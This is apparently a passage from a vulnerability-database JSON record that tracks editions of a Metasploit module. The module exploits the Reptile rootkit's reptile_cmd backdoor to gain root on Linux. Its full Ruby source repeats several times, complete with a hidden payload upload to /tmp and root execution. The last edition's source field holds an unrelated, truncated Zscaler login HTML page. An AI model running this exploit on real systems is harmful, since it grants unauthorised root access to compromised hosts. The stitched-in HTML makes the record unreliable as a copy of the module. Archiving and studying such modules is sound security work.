privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-02-12T11:43:27", "differentElements": ["modified", "published"], "edition": 39}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-02-12T13:47:15", "history": [], "viewCount": 25, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "threatpost", "idList": ["THREATPOST:197EF2227BA5FE3373F8D689A28A3A12", "THREATPOST:333795A46E195AC657D3C50CFAFE7B55", "THREATPOST:D7E85EFA2708BCF8E9777438F3726A49"]}, {"type": "thn", "idList": ["THN:704288D5DDF062A2EEDB6FCE8D5B6A3C"]}, {"type": "kitploit", "idList": ["KITPLOIT:8162170336109838695", "KITPLOIT:6611950990762198766"]}, {"type": "pentestlab", "idList": ["PENTESTLAB:A8BE2A224D15A94D4960B5AE70330CA3"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:B0CE6C640DD3E1A8752E403D8A00FCA5", "PENTESTPARTNERS:345E0FADA7CC8B1D7EAB653B649147CE"]}, {"type": "cve", "idList": ["CVE-2014-9390", "CVE-2020-0729", "CVE-2020-1942", "CVE-2009-4067", "CVE-2013-5582"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0208-1", "OPENSUSE-SU-2020:0209-1"]}, {"type": "cert", "idList": ["VU:597809"]}, {"type": "exploitdb", "idList": ["EDB-ID:48057"]}, {"type": "krebs", "idList": ["KREBS:95DEE0244F6DE332977BB606555E5A3C"]}], "modified": "2020-02-12T13:47:15"}, "score": {"value": 5.1, "vector": "NONE", "modified": "2020-02-12T13:47:15"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-02-12T13:47:15", "differentElements": ["sourceData"], "edition": 40}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "49f1bb4292928bc341f445326a24948b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-02-13T23:51:46", "history": [], "viewCount": 25, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "threatpost", "idList": ["THREATPOST:D002CB7A00429994A6A05F968060A826", "THREATPOST:1594E5079B31AC7BC863795495CCC9D1"]}, {"type": "talosblog", "idList": ["TALOSBLOG:20A06352FED516C3351E8FD11216FD87"]}, {"type": "securelist", "idList": ["SECURELIST:CF7CF3ECE0BABA3A5D477D0DF93EE998"]}, {"type": "cve", "idList": ["CVE-2019-18915", "CVE-2020-1976", "CVE-2011-4908"]}, {"type": "amazon", "idList": ["ALAS-2020-1342"]}, {"type": "exploitdb", "idList": ["EDB-ID:48060", "EDB-ID:48061", "EDB-ID:48065", "EDB-ID:48058"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310815571"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156328", "PACKETSTORM:156335", "PACKETSTORM:156320", "PACKETSTORM:156329"]}, {"type": "akamaiblog", "idList": ["AKAMAIBLOG:80E64BE01EE6F8608C91EA9DD5424CEC"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0213-1"]}], "modified": "2020-02-13T23:51:46"}, "score": {"value": 4.8, "vector": "NONE", "modified": "2020-02-13T23:51:46"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-02-13T23:51:46", "differentElements": ["sourceData"], "edition": 41}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-02-14T03:51:49", "history": [], "viewCount": 26, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "threatpost", "idList": ["THREATPOST:D002CB7A00429994A6A05F968060A826", "THREATPOST:1594E5079B31AC7BC863795495CCC9D1"]}, {"type": "talosblog", "idList": ["TALOSBLOG:20A06352FED516C3351E8FD11216FD87"]}, {"type": "securelist", "idList": ["SECURELIST:CF7CF3ECE0BABA3A5D477D0DF93EE998"]}, {"type": "cve", "idList": ["CVE-2019-18915"]}, {"type": "amazon", "idList": ["ALAS-2020-1342"]}, {"type": "exploitdb", "idList": ["EDB-ID:48065", "EDB-ID:48061", "EDB-ID:48060"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156328"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-2099.NASL", "OPENSUSE-2020-213.NASL", "DEBIAN_DLA-2100.NASL", "REDHAT-RHSA-2020-0477.NASL", "FEDORA_2020-5CE1A122AA.NASL", "FREEBSD_PKG_9D6A48A74DAD11EA8A1D7085C25400EA.NASL", "DEBIAN_DSA-4621.NASL", "CISCO-SA-ISE-XSS-DXJSRWRX.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310815571"]}], "modified": "2020-02-14T03:51:49"}, "score": {"value": 5.6, "vector": "NONE", "modified": "2020-02-14T03:51:49"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-02-14T03:51:49", "differentElements": ["sourceData"], "edition": 42}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "49f1bb4292928bc341f445326a24948b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-02-16T19:56:14", "history": [], "viewCount": 26, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "kitploit", "idList": ["KITPLOIT:6682186653642024628", "KITPLOIT:8440175153390070555"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0222-1", "OPENSUSE-SU-2020:0220-1"]}, {"type": "cve", "idList": ["CVE-2013-4211", "CVE-2019-6195", "CVE-2020-7251", "CVE-2020-8992"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:050D656256F03C0EED34A855C44FC7E0"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E339E76DD9CC8BF6BC7108066B44196A"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310877466", "OPENVAS:1361412562310877465", "OPENVAS:1361412562310853037", "OPENVAS:1361412562310877467", "OPENVAS:1361412562310877462"]}, {"type": "nessus", "idList": ["FREEBSD_PKG_5797C807427911EAB184F8B156AC3FF9.NASL", "DEBIAN_DLA-2102.NASL", "CISCO-SA-20200205-NXOS-CDP-DOS.NASL", "SMB_NT_MS20_FEB_OFFICE.NASL"]}], "modified": "2020-02-16T19:56:14"}, "score": {"value": 4.3, "vector": "NONE", "modified": "2020-02-16T19:56:14"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-02-16T19:56:14", "differentElements": ["sourceData"], "edition": 43}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-02-16T21:45:55", "history": [], "viewCount": 26, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "kitploit", "idList": ["KITPLOIT:6682186653642024628", "KITPLOIT:8440175153390070555"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0222-1", "OPENSUSE-SU-2020:0220-1"]}, {"type": "cve", "idList": ["CVE-2013-4211", "CVE-2019-6195", "CVE-2020-7251", "CVE-2020-8992"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:050D656256F03C0EED34A855C44FC7E0"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E339E76DD9CC8BF6BC7108066B44196A"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310877466", "OPENVAS:1361412562310877465", "OPENVAS:1361412562310853037", "OPENVAS:1361412562310877467", "OPENVAS:1361412562310877462"]}, {"type": "nessus", "idList": ["FREEBSD_PKG_5797C807427911EAB184F8B156AC3FF9.NASL", "DEBIAN_DLA-2102.NASL", "CISCO-SA-20200205-NXOS-CDP-DOS.NASL", "SMB_NT_MS20_FEB_OFFICE.NASL"]}], "modified": "2020-02-16T21:45:55"}, "score": {"value": 4.8, "vector": "NONE", "modified": "2020-02-16T21:45:55"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-02-16T21:45:55", "differentElements": ["sourceData"], "edition": 44}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "367d794c0a3d845f13df3cfe58f95bd5", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-02-19T02:19:50", "history": [], "viewCount": 26, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "threatpost", "idList": ["THREATPOST:62DB17374DCB079A8FC0B6E7CCCB723B", "THREATPOST:815A85AC4471792F2F220EAD5DD49460"]}, {"type": "redhat", "idList": ["RHSA-2020:0543"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:82D5B9376455E3F4C57E94B709E5F38D", "IMPERVABLOG:45672A29BD5190109067ACF0793539C6"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:9121787340B5AC709E5CB77061C0A6DA"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:9D74A0280612C873662F0DD613EE4C32"]}, {"type": "thn", "idList": ["THN:9994A9D5CFB76851BB74C8AD52F3DBBE"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-0540", "ELSA-2020-0515", "ELSA-2020-0520"]}, {"type": "ubuntu", "idList": ["USN-4286-2", "USN-4287-1", "USN-4287-2", "USN-4285-1", "USN-4286-1"]}, {"type": "ics", "idList": ["ICSMA-20-049-01", "ICSMA-20-049-02"]}, {"type": "talos", "idList": ["TALOS-2020-0985"]}], "modified": "2020-02-19T02:19:50"}, "score": {"value": 1.1, "vector": "NONE", "modified": "2020-02-19T02:19:50"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "<!-- username.html--><!DOCTYPE html><html><head><meta http-equiv=\"content-type\" content=\"text/html; charset=UTF-8\"><meta name=\"viewport\" content=\"width=device-width, initial-scale=1\"><title>Welcome To Zscaler Directory Authentication</title><style type=\"text/css\">body { background-color: #FFF; font-family: Arial, sans-serif; font-size: 12px; text-align: center; color: #4B4F54; overflow: hidden; margin: 0;}a { color: #009dd0; cursor: pointer; text-decoration: none;}form { width: 100%; height: 100%; margin: 0; padding: 0;}input { font-family: Arial; font-size: 100%; margin: 0; width: 100%; vertical-align: top; color: #424242; display: inline-block; border: none; padding: 0; text-align: left; height: 100%; width: calc(100% -35px);}table { margin-top: 10px; text-align: center; background-color: white;}table.table-company-logo { background-color: #e3e3e3;}table.table-upper { border-radius: 10px;}table.table-lower { border-bottom-left-radius: 10px; border-bottom-right-radius: 10px; background-color: #f3f3f3;}table.table-field-label { margin-bottom: 2px;}table.table-field-input div.input-wrapper { display: block; border-color: #2a2c30;; width: inherit; padding-left: 10px;}table.table-field-input .input-wrapper.disabled { border-color: #cfd0d1;}table.zsc-company { border-bottom-left-radius: 10px; border-bottom-right-radius: 10px; background-color: #f3f3f3;}table.zsc-company td { border-bottom-left-radius: 10px; border-bottom-right-radius: 10px; font-size: 11px; color: #939393;}.table-half-column-fixed { width: 356px;}table + table, td table { margin-top: 0;}td.td-field-label { font-size: 16px; color: black;}td.td-field-act { font-size: 13px; color: #009dd0;}td.td-field-act img { vertical-align: middle;}img { max-height: 80px; max-width: 430px;}img.act-icon { padding-right:3px;}.or { background: #ff9500;}.gr { background: #e3e3e3;}.gy { background: #939597;}.yl { background: #ffc800;}.red { background: #c20000;}.pg { position: absolute; top: 0; bottom: 0; left: 0; right: 0; white-space: nowrap; height: 100%; overflow: auto;}.pg:before { content: \"\"; display: inline-block; height: 100%; vertical-align: middle;}.pg_cont { display: inline-block; vertical-align: middle; width: 100%;}.m_tbl { width: 90%; min-width: 600px; max-width: 758px; max-height: 258px; background: #FFF; white-space: normal; border: 3px solid #399c1d; border-radius: 10px;}.m_tbl.tbl_error { border-color: #77797c;}.eu_h.tbl_error { color: #77797c;}.eu_h { vertical-align: middle; font-weight: bold; border-radius: 10px; font-size: 24px; color: #399c1d; font-weight: normal; padding: 20px 20px 0 20px;}.sm { font-size: 20px; color: 